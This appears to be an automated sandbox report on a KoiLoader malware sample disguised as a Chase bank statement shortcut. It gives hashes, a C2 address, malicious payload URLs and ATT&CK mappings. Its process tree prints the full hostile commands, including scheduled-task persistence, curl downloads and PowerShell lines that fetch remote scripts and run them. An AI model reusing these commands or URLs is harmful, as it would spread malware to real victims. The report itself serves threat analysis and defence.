Overview

overview

10

Static

static

1

chase_14_0...nt.lnk

windows7-x64

3

chase_14_0...nt.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    457s
  • max time network
    461s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-06-2024 13:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    chase_14_06_24_statement.lnk

  • Size

    2KB

  • MD5

    6e46db2bb323d9c90717bc4acede81e1

  • SHA1

    506fb29a25eb35a590eec152c260d783719a85f1

  • SHA256

    95ebb135bedca3d8bc005af49079cc5399ac795aec0df21d0477ccd716d14882

  • SHA512

    eb0e6a6b5b5a15a88c9fe3e8cebbf58617addc8604eb5e2923e78a24407df860f08ecae892b60f2ea8a340211b2474f8d1eb5f28d378cba046693222eaf73083

Score
10/10
koiloaderexecutionloader

Malware Config

Extracted

Family

koiloader

C2

http://176.10.111.71/guapen.php

Attributes
  • payload_url

    https://schermarieti.it/wp-content/uploads/2019/09

Signatures

  • KoiLoader

    KoiLoader is a malware loader written in C++.

    loaderkoiloader
  • Detects KoiLoader payload 1 IoCs
    loader
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\chase_14_06_24_statement.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1412
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /sc minute /tn i1YsdL7m9k4xOoZ /f /mo 1 /tr "wscript 'C:\Users\Admin\AppData\Local\Temp\U43kOF8PhQeq.js' i1YsdL7m9k4xOoZ" & curl -s -o U43kOF8PhQeq.js -v "https://schermarieti.it/wp-content/uploads/2019/09/incarcerative7iEA.php"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3620
      • C:\Windows\system32\schtasks.exe
        schtasks /create /sc minute /tn i1YsdL7m9k4xOoZ /f /mo 1 /tr "wscript 'C:\Users\Admin\AppData\Local\Temp\U43kOF8PhQeq.js' i1YsdL7m9k4xOoZ"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4760
      • C:\Windows\system32\curl.exe
        curl -s -o U43kOF8PhQeq.js -v "https://schermarieti.it/wp-content/uploads/2019/09/incarcerative7iEA.php"
        3⤵
          PID:2612
    • C:\Windows\system32\wscript.EXE
      C:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\Temp\U43kOF8PhQeq.js" i1YsdL7m9k4xOoZ
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1808
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -com "IWR -useb 'https://schermarieti.it/wp-content/uploads/2019/09/bitteredXD3.php' -outf $env:tmp\9MP4IOZ4SEWR.js; schtasks /delete /tn i1YsdL7m9k4xOoZ /f; wscript $env:tmp\9MP4IOZ4SEWR.js "
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3264
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /delete /tn i1YsdL7m9k4xOoZ /f
          3⤵
            PID:2368
          • C:\Windows\system32\wscript.exe
            "C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\9MP4IOZ4SEWR.js
            3⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:3200
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$env:paths = '7z0QIO9ITCMD'; IEX(IWR -UseBasicParsing 'https://schermarieti.it/wp-content/uploads/2019/09/eriocomiXQ.ps1'); $ff.SetValue($null, 'NCyJQuuZNa9qj7C2LWi5B3o80AH61I5JkydiGE4PrO4Se'.Contains('Wi5B3o80')); IEX(IWR -UseBasicParsing 'https://schermarieti.it/wp-content/uploads/2019/09/zietrisikiteFtK.ps1')"
              4⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3996

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Command and Scripting Interpreter

      2
      T1059

      PowerShell

      1
      T1059.001

      JavaScript

      1
      T1059.007

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Persistence

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Privilege Escalation

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Defense Evasion

      Credential Access

      Discovery

      Query Registry

      2
      T1012

      System Information Discovery

      2
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        0f6a3762a04bbb03336fb66a040afb97

        SHA1

        0a0495c79f3c8f4cb349d82870ad9f98fbbaac74

        SHA256

        36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383

        SHA512

        cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\9MP4IOZ4SEWR.js
        Filesize

        1KB

        MD5

        99aacfbcf4727114fc887122f5a5c804

        SHA1

        d8c8ee293e8fcec8583a5a1a143e439e7969a102

        SHA256

        e3cf143dc67fe548e8c2fc95b723d43e704808a4ee35635a30631f6dbe25db82

        SHA512

        94792e1a79f07d041ca3ea562f04aef20567a3c46bd8d2e21c64057cd5adf5cdf8035a894d5e25eef6f0c22acf1aafb4a1a08d07f22910c6e206441aa1f1a312

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\U43kOF8PhQeq.js
        Filesize

        278B

        MD5

        90bd896fed73c9f099f5665a7726f074

        SHA1

        57b9031e316d47fdf7d5a64d0a6fc49b329c0d69

        SHA256

        46defbba13543653ce04f47d150aa9162fb344575056c632dc907ae1ae3b10e6

        SHA512

        13c0ef9f1e24477eb4a61345aceaf8176cbe929f50a32150ed8a4a3296df4d2fc4886b23e59a182130fd3dd4163d826272a9ddd3cf8627c9bec0c063eb665281

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cy3rjavv.mxc.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit
      • memory/3264-11-0x000001ED2D970000-0x000001ED2D992000-memory.dmp
        Filesize

        136KB

        Download
      • memory/3996-21-0x0000000005870000-0x00000000058D6000-memory.dmp
        Filesize

        408KB

        Download
      • memory/3996-19-0x00000000053E0000-0x0000000005402000-memory.dmp
        Filesize

        136KB

        Download
      • memory/3996-20-0x0000000005790000-0x00000000057F6000-memory.dmp
        Filesize

        408KB

        Download
      • memory/3996-18-0x0000000005A90000-0x00000000060B8000-memory.dmp
        Filesize

        6.2MB

        Download
      • memory/3996-31-0x00000000060C0000-0x0000000006414000-memory.dmp
        Filesize

        3.3MB

        Download
      • memory/3996-17-0x0000000002ED0000-0x0000000002F06000-memory.dmp
        Filesize

        216KB

        Download
      • memory/3996-33-0x0000000006490000-0x00000000064AE000-memory.dmp
        Filesize

        120KB

        Download
      • memory/3996-34-0x00000000064D0000-0x000000000651C000-memory.dmp
        Filesize

        304KB

        Download
      • memory/3996-35-0x0000000007CE0000-0x000000000835A000-memory.dmp
        Filesize

        6.5MB

        Download
      • memory/3996-36-0x00000000069F0000-0x0000000006A0A000-memory.dmp
        Filesize

        104KB

        Download
      • memory/3996-37-0x0000000007B70000-0x0000000007B71000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3996-39-0x0000000007B90000-0x0000000007B9D000-memory.dmp
        Filesize

        52KB

        Download